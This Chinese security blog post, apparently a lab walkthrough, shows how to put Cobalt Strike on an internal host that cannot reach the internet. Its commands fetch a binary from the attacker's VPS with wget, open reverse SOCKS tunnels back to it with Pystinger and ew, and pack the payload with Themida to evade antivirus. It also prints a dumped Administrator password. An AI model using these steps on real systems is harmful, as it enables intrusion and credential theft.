Pystinger上线不出网机器

最新推荐文章于 2024-11-05 14:09:52 发布
原创 最新推荐文章于 2024-11-05 14:09:52 发布 · 554 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Pystinger #毒刺 #Cobalt Strike #内网渗透

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

01 使用场景

毒刺(Pystinger)通过webshell搭建内网socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出网但存在web应用可被互联网访问的情况

02 拓扑结构

图片

03  使用方法

下载地址:

https://github.com/FunnyWolf/pystinger

图片

  1. 拿下第一层网络后,上传webshell到机器上。

图片

访问

http://靶机VPS:7777/proxy.php

此时页面出现UTF-8即为成功。

图片

  1. stinger_server上传到目标服务器并开启服务端等待客户端连接

图片

可能是因为文件太大,压缩之后还是没法传

这里使用命令行远程Wget来下载到目标服务器上。

在自己的VPS上搭建一个server  

 python3 -m http.server 1234

图片

在目标服务器上使用wget来下载  

wget http://自己的VPS:1234/stinger_server

图片

然后执行

 chmod 700 stinger_server
    
 ./stinger_server 0.0.0.0

图片

在自己的VPS服务器上执行

./stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000

图片

此时目标机的60020端口已经映射到了VPS的60020端口了。

在VPS上启动CS的服务端,然后设置监听,其中HTTP Hosts为目标机的ip地址,端口默认60020

目标机网络:

192.168.99.110

10.0.1.135

图片

这里是目标机的内网IP地址

图片

生成木马

图片

保存等待上传到内网机

04  代理到内网机

先在目标机执行ew

./ew_for_linux64  -s rssocks -d 自己的VPS -e 4399

图片

然后在VPS上执行ew

./ew_for_linux64 -s rcsocks -l 1080 -e 4399

图片

设置代理之后即可访问内网

图片

图片

拿下webshell权限之后,使用蚁剑连接,准备传exe

配置蚁剑代理,重启

图片

图片

05  免杀火绒登陆3389

然后上传exe上去,但是由于内网机有火绒,所以在这里需要免杀处理。

使用Themida加壳免杀。

图片

上传至内网机。

图片

然后运行程序,上线成功

图片

抓密码:

图片

用户名:Administrator

密码:!QW@34567

检测3389是否开启

图片

端口是3389,设置代理直接登陆。

使用Proxifiler

图片

登陆成功。

图片

06 小插曲

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息! 

 

 

内网隧道代理技术(二十)之 CS使用HTTP代理上线不出机器
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-02 1058
如图A区域存在一台中转机器,这台机器可以出,这种是最常见的情况。我们在渗透测试的过程中经常是拿下一台边缘机器,其有多块卡,边缘机器可以访问内网机器内网机器不出
内网隧道代理技术(二十二)之 CS针对特定端口上线不出机器
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-03 558
如果说当我们拿到一台电脑(一般是WEB机器)但是不出。只有 Http 服务的80端口可以连接(特定端口可以出),只有webshell的情况下,我们进行反弹shell等操作因为端口被限制而失败,此时我们该如何将只有80端口出机器上线到CS呢?这个时候我们就需要借助80端口,然后开启socks隧道,从而将不出的电脑内网机器A(Web服务器)进行上线到CS。
毒刺)利用Pystinger Socks4上线不出主机
mingyqf的博客
07-01 1278
原文链接:https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出主机的姿势,包括单主机和内网多台主机的两种常见场景!!!项目地址:https://github.com/FunnyWolf/pystinger**相关阅读:**1、利用MSF上线主机的思路分享2、利用goproxy http上线不出主机0x01 测试环境 0x02 Pystinger简单介绍Pystinger由服
上线不出机器
最新发布
qq_64177395的博客
11-05 1096
如果说当我们拿到一台电脑(一般是WEB机器)但是不出。只有http端口可以连接,只有webshell的情况下,我们该如何上线到CS呢?这个时候就要借助80端口,然后开启socks隧道,从而进行上线
内网渗透中目标不出的情况下使用pystinger进行上线Cobalt Strike
qq_43776040的博客
02-17 3490
内网渗透中目标不出的情况下使用pystinger进行上线cobaltstrike简介上传服务端与代理文件 简介 By:猪儿虫 Github:https://github.com/black537 在内网渗透中我们常常遇到内网不出的情况。今天推荐一款工具pystinger。这款工具是一个使用webshell进行流量转发出的工具。它使用的是sock4代理,端口映射。可直接进行上线metasploit-framework、viper、cobalt strike。目前只支持PHP、jsp(x)、aspx三种
Cobalt Strike上线不出的Linux与Windows主机
weixin_44480014的博客
06-09 2300
在真实的内网中,很容易遇到内网主机不出的情况。这种情况又可以分为边缘主机为Linux和为Windows两类。windows上线windows很容易,linux上线linux或者windows上线linux可以用CrossC2插件来解决。比较麻烦的就是边缘主机为Linux的情况上线内网Windows主机。CrossC2暂时不支持Linux上线Windows,不过作者已经把该需求设置为了New,期待接下来的版本可以支持该功能。网上普遍的思路是利用Pystinger的socks4(为什么不用socks5应该是C
【工具使用】Pystinger(毒刺)的使用
李同學的安全圈
03-09 1765
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内网 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
内网渗透--对不出目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1841
配置络 在VM虚拟机中按照下边的络拓扑进行配置络。络拓扑图如下: win7具有双卡,其中外ip是192.168.8.133,内网段是52。三台机器彼此互通,但是win server 2008和win2003不通外。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外打点 在win7这台靶机上,使用PHPStudy让站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这站进行渗透,因为本文主要写在内网渗透过程..
内网渗透】利用非常规手段突破安全策略上线CS
HBohan的博客
10-28 1346
前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 【查看资料】 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 2016,目标不出! 装有杀毒软件(火绒、微软自带的WD),ASMI默认开启,而且对power shell有特殊策略限制。 Tcp、icmp、DNS协议不通,无法直接与公的cs服务端建立连接,(内网的cs服务端也无法与其建立连接)公也无法访问目标web服务(纯内网web服务) 极其严格的出入站策略 入
pystinger实现不出情况下,上线CS的方式
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
04-25 496
获取到webshell,目标服务器不出。目标机:内网地址,端口映射到公ip。s生成后门在目标机运行。
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 2753
pystinger毒刺是一款正向代理工具,通过webshell可以实现内网 socks4代理和端口映射,并且也可以直接上线MSF和CS。
渗透工具pystinger:一款使用 webshell 进行流量转发的出工具
学习、分享、交流
05-09 2111
通过webshell实现内网SOCK4代理,端口映射. 可直接用于metasploit-framework,viper,cobalt strike上线. 主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本.
使用Pystinger进行编程
PixelInk的博客
09-13 87
我们讨论了Pystinger的安装过程,以及加载音频文件、可视化音频波形、提取音频特征和进行音频处理的示例代码。希望这些示例能帮助您开始使用Pystinger,并在声音信号处理的任务中取得进展。它提供了丰富的功能,可以帮助开发人员在音频处理和分析的任务中取得进展。本文将介绍Pystinger的使用,并提供一些示例代码来说明其功能和用法。要开始使用Pystinger,首先需要将其安装到您的Python环境中。Pystinger提供了一些函数来提取音频的各种特征,如时域特征、频域特征等。
一款使用webshell进行流量转发的出工具(pystinger)
lza20001103的博客
08-26 513
一款使用webshell进行流量转发的出工具(pystinger) 下载地址:https://github.com/FunnyWolf/pystinger
Pystinger的使用
谢公子的博客
08-30 2776
目录 Pystinger 实现多主机上线cs 目标主机执行 VPS执行 CS开启监听 生成木马 内网横向移动 Pystinger 一款利用webshell实现内网socks4代理、端口映射的工具,可直接用于MSF/CS等上线。使用python编写, 当前支持php,jsp(x),aspx三种代理脚本 。 项目地址: https://github.com/FunnyWolf/pystinger 原地介绍: https://mp.weixin.qq.com/s/45AKbRS677fxyn
Pystinger实现内网主机CS上线
痴人说梦梦中人
03-29 4933
Pystinger实现内网主机CS上线一、Pystinger简介二、原理分析三、操作演示 一、Pystinger简介         毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。 repo:https://github.c
Metasploit和Cobaltstrike上线不出机器
qq_40863723的博客
02-14 4314
多喝热水:http://hackergu.com 内网中的很多机器是不可以出的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.101.90 LPORT=7777 -f elf >test.elf 在目标机器上使...
ShowDoc突破边界上线Linux不出主机
afei001
08-10 532
通过前期的信息收集发现目标子目录使用了ShowDoc组件。ShowDoc一个开源的、适合IT团队的在线API文档、技术文档工具。Showdoc是存在不少漏洞的,通过探测发现后台存在文件上传漏洞。二话不说,掏出POC,上传冰蝎免杀webshell上线。...
信息技术安全面试热门:红队技巧与防御机制解析
7. **正向shell的其他方法**:除了使用reg键值,还可以通过Webshell建立内网SOCKS4代理,实现端口映射,使目标主机在不出的情况下与攻击者控制台(CS)建立连接。pystinger是一个例子,可以用于此类操作。 8. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值